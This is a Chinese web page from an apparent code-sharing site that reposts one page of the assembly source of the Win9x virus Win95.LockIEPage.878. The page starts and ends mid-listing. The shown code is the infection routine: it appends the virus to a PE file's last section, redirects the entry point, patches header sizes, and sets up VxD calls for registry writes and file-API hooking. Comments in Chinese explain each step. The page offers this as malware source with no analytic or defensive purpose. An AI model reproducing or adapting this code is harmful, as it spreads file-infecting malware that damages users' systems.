 |
Win9x病毒--Win95.LockIEPage.878原代码 |
|
| Win9x病毒--Win95.LockIEPage.878原代码 |
|
| 作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-29 15:22:23
|
ecx
cmp eax,size ReadFileBuffer-200h
ja short @@CloseFile
lea edi,[esi.fhObjectTable00+eax] ;得到最后一块段表地址
mov edx,[edi.otPhysOffset]
add edx,[edi.otPhysSize]
mov ecx,VirusSize
push esi
@@GetVirusBase:
mov esi,ebp
sub esi,OFF FilePathBuffer-OFF @@Start
mov eax,0d601h
call @@FileIo ;IFSCall_FileIo 写文件,将病毒写在最后一段的末尾
pop esi
jc short @@CloseFile
@@SetNewEntryRVA:
mov eax,[edi.otPhysSize]
add eax,[edi.otRVA]
mov [esi.fhEntryRVA],eax ;改变文件的入口RVA(相对虚拟地址)
@@FixOtherHeaderVar: ;修改相关文件头变量
add [edi.otPhysSize],ecx
mov eax,[edi.otPhysSize]
sub eax,[edi.otVirtSize]
jb short @@VirtSizeIsBigger
@@PhysSizeIsBigger:
add [edi.otVirtSize],eax
add [esi.fhImageSize],eax
@@VirtSizeIsBigger:
nop
@@GetReadFileBuffer0:
mov esi,ebp
add esi,size FilePathBuffer
@@WriteBackFileHeader:
mov ecx,size ReadFileBuffer
xor edx,edx
mov eax,0d601h
call @@FileIo ;IFSCall_FileIo 写文件,将文件头写回文件
@@CloseFile:
mov eax,0d700h
call @@FileIo ;IFSCall_FileIo 关闭文件
@@OpenFileFalse:
ret
@@FileIo:
int 20h ;这里是IFSCall_FileIO子函数
dd 00400032h
ret
@@SetVxdCall: ;以下是恢复VXDCALL(Int 20h)指令
pop ebx
push ebx
mov ax,020cdh
lea esi,[ebx+OFF @@VxdCallTable-@@SetVxdCallOk]
cld
lea edi,[ebx+OFF @@RegOpenKey-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@RegSetValueEx-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@RegCloseKey-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@AllocPage-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@HookFileApi-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@UniToBCSPath-OFF @@SetVxdCallOk]
stosw
movsd
lea edi,[ebx+OFF @@FileIo-OFF @@SetVxdCallOk]
stosw
movsd
ret
@@VxdCallTable: ;VXD调用列表
dd 00010148h ;VMMCall_RegOpenKey
dd 00010152h ;VMMCall_RegSetValueEx
dd 00010149h ;VMMCall_RegCloseKe上一页 [1] [2] [3] [4] [5] 下一页
|
|
[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入:kinda 责任编辑:kinda |
|
上一篇文章: Tini 的VC原代码
下一篇文章: C语言库函数(A类字母) |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)